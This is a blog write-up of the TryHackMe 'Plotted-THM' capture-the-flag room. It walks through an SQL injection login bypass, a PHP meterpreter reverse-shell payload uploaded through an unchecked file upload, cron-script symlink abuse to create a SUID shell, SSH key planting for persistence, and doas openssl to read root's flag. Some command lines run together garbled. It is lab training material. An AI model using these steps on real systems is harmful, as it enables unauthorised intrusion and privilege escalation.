THM: Plotted-THM Writeup

Plotted-THM is beginner-level CTF where enumeration is key. There are multiple points of entry onto this machine and it's up to us to choose the best route. This room is part of my 30 days of“30 days of TryHackMe” where I will try and complete 30 rooms in 30 days. Plotted-THM is the room for Day 3. So let’s begin.

Disclaimer: The tools used in this tutorial are powerful. Please use them on systems you can legally tamper with. These tutorials are for educational purposes only.

Connect to TryHackMe via OpenVPN

You can learn how to do so here.

Discovery

We will begin with searching for all the services running on the provided IP by using the following command:

sudo nmap -sC -sV <MACHINE IP>

The output should look something like this:

You can see ports for SSH and two HTTP ports are open to being tested. Let's go!

Enumeration

Start with the most obvious route which is using the machine IP in the browser. We see it's an apache server. So we brute force the directories on the server by using the DirBuster tool as follows first on port 8- and then 445:

DirBuster

We see the following output and hence go check these URLs in our browser.

On port 80
On port 445

The next obvious tool to use is WPScan. I assumed it was a WordPress website but, it wasn't. We check the URL manually now. We see the first /admin folder has these files sadly it leads nowhere.

Website on Port 80

Next, we try port 445, and yes we have a live page we can work from.

Website on Port 445

Start by looking around and hitting the login page. The login page looks pretty dated, that reminds me of SQL Injection so let's try that.

SQL with a twist

Quite literally the most basic SQLi works and you are in!

admin' or 1=1 -- -

Let's now look around to find something juicy. We see in the ‘Drivers List’ tab we can create a new driver. While entering the driver’s details, it gives us an option to upload files. After checking further, looks like there is no file extension verification. This reminds me of a code execution attack. Let's take that route.

Gaining Access

We use our good old friend MetaSploit Framework to develop our payload by using the following command:

msfconsole -p php/meterpreter/reverse_tcp LHOST=<YOUR IP> LPORT=<ANY PORT> p > exploit.php
Payload Development

We now upload this PHP file in place of a picture and hit same.

entering driver details and exploit code of course

On our local machine, we start a Netcat listener with the same port number as we entered above and run the code or look at the driver details using the view button. YESS! We are in with a reverse-tcp.

It's time to now have a solid shell. Reverse_TCP on PHP is notoriously unstable, so we spawn a new shell by issuing the following commands with python:

python3 -c 'import pty; pty.spawn("/bin/bash")'export TERM=xterm Ctrl + Zstty raw -echo; fg
Python FTW!

This gives us a stable shell and we are good to move forward.

With an ls we can see that user.txt is right there but, is not readable by the current user. Time to escalate privileges!

Privilege Escalation

We dig around for quite some time and see a backup.sh file in the scripts directory, this looks interesting. This file is called by crontab and is called every one minute and runs with higher privileges of a user named plot_admin. So we create a new file in the same directory and create a soft link to run our file as well, this can be done as follows:

echo "cp /bin/bash /home/plot_admin/shell; chmod +xs /home/plot_admin/shell > script.shchmod +x script.shln -sf script.sh backup.sh/home/plot_admin/shell -p 

We can now add our own ssh keys to the authorized keys for plot_admin user and ssh into the target as so:

cd /home/plot_adminmkdir .sshchmod 0777 .sshecho <YOUR PUBLIC SSH KEY> > .ssh/authorized_keyschmod 0600 .ssh/authorized_keys

Try SSH and we are in! User plot_admin has been compromised successfully.

one man down! compromised plot_admin

This gives us user.txt:

user.txt

Now to head to root. We try sudo -l and it fails. So start looking for files with permission errors with this:

find / -user root -perm /4000

Nothing looks too interesting other than doas script and turns out it runs OpenSSL as root without a password. This is our route forward.

We cd into the doas script folder and use the bin found here to show is root.txt

doas openssl enc -in "/root/root.txt" 

Awesome! There you go, folks! another room down. We learn how to enumerate webservers, PHP code execution, and Linux privilege escalation. We will continue this journey tomorrow for the next 27 days. Good Day!

Rando Quote:
There are glimpses of heaven to us in every act, or thought, or word, that raises us above ourselves.
- Robert Quillen

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Gaurav Sarraf

Gaurav Sarraf

Security Engineer cum Researcher | Graduate Student @ Syracuse University | Space Enthusiast | bit.ly/gs-LinkedIn | bit.ly/gs-GitHub | thinkrobotics.in